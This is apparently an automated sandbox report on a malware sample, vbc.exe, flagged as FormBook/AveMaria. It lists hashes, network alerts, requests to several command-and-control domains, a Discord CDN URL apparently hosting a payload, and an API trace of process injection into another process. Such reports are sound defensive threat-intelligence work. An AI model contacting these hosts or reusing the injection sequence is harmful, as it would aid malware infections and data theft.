Summary | ZeroBOX

vbc.exe

Malicious Library UPX PE32 PE File
Category FILE
Machine s1_win7_x6401
Started July 28, 2021, 9:30 a.m.
Completed July 28, 2021, 9:34 a.m.
Size 664.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 18e38eae3d407418b879271c9b5736bd
SHA256 38ba862149962bc5a10825a2b818391624cda439fcb3f6212b75d84eeeb4f70c
CRC32 90A65266
ssdeep 12288:mDPmOzS2AO+GBDfNj/nNImvYGU3F4JDW6xpYMeAEGGQPN+BRKa:0eJ2Aq9p/nWmwG845W6xKMeWP
Yara
  • IsPE32 - (no description)
  • UPX_Zero - UPX packed file
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature

Suricata Alerts

Flow | SID | Signature | Category
TCP 192.168.56.101:49201 -> 162.159.134.233:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 192.168.56.101:49200 -> 162.159.134.233:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 192.168.56.101:49205 -> 64.34.75.141:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49205 -> 64.34.75.141:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49205 -> 64.34.75.141:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 34.102.136.180:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 34.102.136.180:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 34.102.136.180:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49207 -> 88.214.207.96:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49207 -> 88.214.207.96:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49207 -> 88.214.207.96:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 34.102.136.180:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 34.102.136.180:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 34.102.136.180:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49215 -> 208.109.22.100:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49215 -> 208.109.22.100:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49215 -> 208.109.22.100:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 182.50.132.242:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 182.50.132.242:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 182.50.132.242:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected

Suricata TLS

Flow | Issuer | Subject | Fingerprint
TLSv1 192.168.56.101:49200 -> 162.159.134.233:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.101:49201 -> 162.159.134.233:443 | None | None | None

section .itext
packer BobSoft Mini Delphi -> BoB / BobSoft
resource name RDTA
suspicious_features: GET method with no useragent header
suspicious_request: GET http://www.brightimewatches.com/bsk9/?t8o4nPp=kaXVI8mGssjTav/La5mnkdXKeQWIgX/VfzBlfkVGxIFVCgMTzil3/n4Sv05bj+iGu4kpHiKs&jPj8q=Klh8
suspicious_features: GET method with no useragent header
suspicious_request: GET http://www.designtechnician.com/bsk9/?t8o4nPp=TvVK73TRf5j6s1n7h7T5c3CBRbgVn1dkElf2PsyhDBWyU3z8P+JBq7DG4FpqoYni6N2IZF7Y&jPj8q=Klh8
suspicious_features: GET method with no useragent header
suspicious_request: GET http://www.mycupofteainnovations.com/bsk9/?t8o4nPp=Si5ZJRft9DXQG2cDg3004meRUKMojHlA9AsgkzbvAOzWsE4N89OHu/2KBDAzoyeOENkp7ks8&jPj8q=Klh8
suspicious_features: GET method with no useragent header
suspicious_request: GET http://www.texttalktv.com/bsk9/?t8o4nPp=1ZhD0vtF2duhbIhiPjCtKCwSgB3qgGhCJxQx1JqwbXK1OmkrsYZcetPPHcWMEPEbw96IhHtQ&jPj8q=Klh8
suspicious_features: GET method with no useragent header
suspicious_request: GET http://www.ds-117.com/bsk9/?t8o4nPp=hooPU96Upk2pq/4iMoeF2F/+J701iyWmziTSNhhyumhkPjSDDokaN9dimgHfx2T3RL15aR4L&jPj8q=Klh8
suspicious_features: GET method with no useragent header
suspicious_request: GET http://www.tombison.com/bsk9/?t8o4nPp=ogtt1MRFxFLond3QItB5pQGTqAA1l5pj16H7SQAv8iWZ8sAVaMDbEFV2t+4JtDPR25+GXpiQ&jPj8q=Klh8
request POST http://www.brightimewatches.com/bsk9/
request GET http://www.brightimewatches.com/bsk9/?t8o4nPp=kaXVI8mGssjTav/La5mnkdXKeQWIgX/VfzBlfkVGxIFVCgMTzil3/n4Sv05bj+iGu4kpHiKs&jPj8q=Klh8
request POST http://www.designtechnician.com/bsk9/
request GET http://www.designtechnician.com/bsk9/?t8o4nPp=TvVK73TRf5j6s1n7h7T5c3CBRbgVn1dkElf2PsyhDBWyU3z8P+JBq7DG4FpqoYni6N2IZF7Y&jPj8q=Klh8
request POST http://www.mycupofteainnovations.com/bsk9/
request GET http://www.mycupofteainnovations.com/bsk9/?t8o4nPp=Si5ZJRft9DXQG2cDg3004meRUKMojHlA9AsgkzbvAOzWsE4N89OHu/2KBDAzoyeOENkp7ks8&jPj8q=Klh8
request POST http://www.texttalktv.com/bsk9/
request GET http://www.texttalktv.com/bsk9/?t8o4nPp=1ZhD0vtF2duhbIhiPjCtKCwSgB3qgGhCJxQx1JqwbXK1OmkrsYZcetPPHcWMEPEbw96IhHtQ&jPj8q=Klh8
request POST http://www.ds-117.com/bsk9/
request GET http://www.ds-117.com/bsk9/?t8o4nPp=hooPU96Upk2pq/4iMoeF2F/+J701iyWmziTSNhhyumhkPjSDDokaN9dimgHfx2T3RL15aR4L&jPj8q=Klh8
request POST http://www.tombison.com/bsk9/
request GET http://www.tombison.com/bsk9/?t8o4nPp=ogtt1MRFxFLond3QItB5pQGTqAA1l5pj16H7SQAv8iWZ8sAVaMDbEFV2t+4JtDPR25+GXpiQ&jPj8q=Klh8
request GET https://cdn.discordapp.com/attachments/862558875870036001/869107915900989440/Mnwgrkqawpzldlsoxhgayuiojpposxx
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1868
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72b62000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtAllocateVirtualMemory

process_identifier: 1868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtAllocateVirtualMemory

process_identifier: 1868
region_size: 163840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10410000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1868
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 94208
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x04281000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0
section .rsrc: size_of_data 0x0002fa00, virtual_address 0x00080000, virtual_size 0x0002f8f8, entropy 7.0325191037; description: A section with a high entropy has been found
entropy 0.287113790505 description Overall entropy of this PE file is high
buffer Buffer with sha1: d676fda316250913d7d91b30ba44149d7ce44c4d
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 556
region_size: 163840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10410000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000530
status: 1  return: 0  repeated: 0

NtAllocateVirtualMemory

process_identifier: 556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000530
status: 1  return: 0  repeated: 0

NtAllocateVirtualMemory

process_identifier: 556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00100000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000530
status: 1  return: 0  repeated: 0
Process injection Process 1868 created a remote thread in non-child process 556
Time & API Arguments Status Return Repeated

CreateRemoteThread

thread_identifier: 1812
process_identifier: 556
function_address: 0x00100000
flags: 0
stack_size: 0
parameter: 0x000f0000
process_handle: 0x00000530
status: 1  return: 1332  repeated: 0
Process injection Process 1868 manipulating memory of non-child process 556
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 556
region_size: 163840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10410000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000530
status: 1  return: 0  repeated: 0

NtAllocateVirtualMemory

process_identifier: 556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000530
status: 1  return: 0  repeated: 0

NtAllocateVirtualMemory

process_identifier: 556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00100000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000530
status: 1  return: 0  repeated: 0
Process injection Process 1868 injected into non-child 556
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: APÐB
base_address: 0x000f0000
process_identifier: 556
process_handle: 0x00000530
status: 1  return: 1  repeated: 0

WriteProcessMemory

buffer: [raw binary buffer omitted]
base_address: 0x00100000
process_identifier: 556
process_handle: 0x00000530
status: 1  return: 1  repeated: 0
process vbc.exe useragent zipo
process vbc.exe useragent aswe
Bkav W32.AIDetect.malware1
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Zusy.395374
FireEye Gen:Variant.Zusy.395374
Cybereason malicious.a46738
Cyren W32/Trojan.QUFK-1166
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/Injector.EPVD
APEX Malicious
Paloalto generic.ml
Kaspersky HEUR:Trojan-Spy.Win32.AveMaria.gen
BitDefender Gen:Variant.Zusy.395374
Avast Win32:Malware-gen
Ad-Aware Gen:Variant.Zusy.395374
Sophos ML/PE-A
DrWeb Trojan.DownLoader40.49340
McAfee-GW-Edition Fareit-FCVN!18E38EAE3D40
Emsisoft Gen:Variant.Zusy.395374 (B)
Microsoft Trojan:Win32/AVeMariaRAT.RVA!MTB
GData Gen:Variant.Zusy.395374
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win.Generic.C4567571
McAfee Fareit-FCVN!18E38EAE3D40
MAX malware (ai score=80)
VBA32 Exploit.UAC
eGambit Unsafe.AI_Score_99%
Fortinet W32/Injector.EPVD!tr
BitDefenderTheta Gen:NN.ZelphiF.34050.PKW@a0VMAsbi
AVG Win32:Malware-gen
Panda Trj/GdSda.A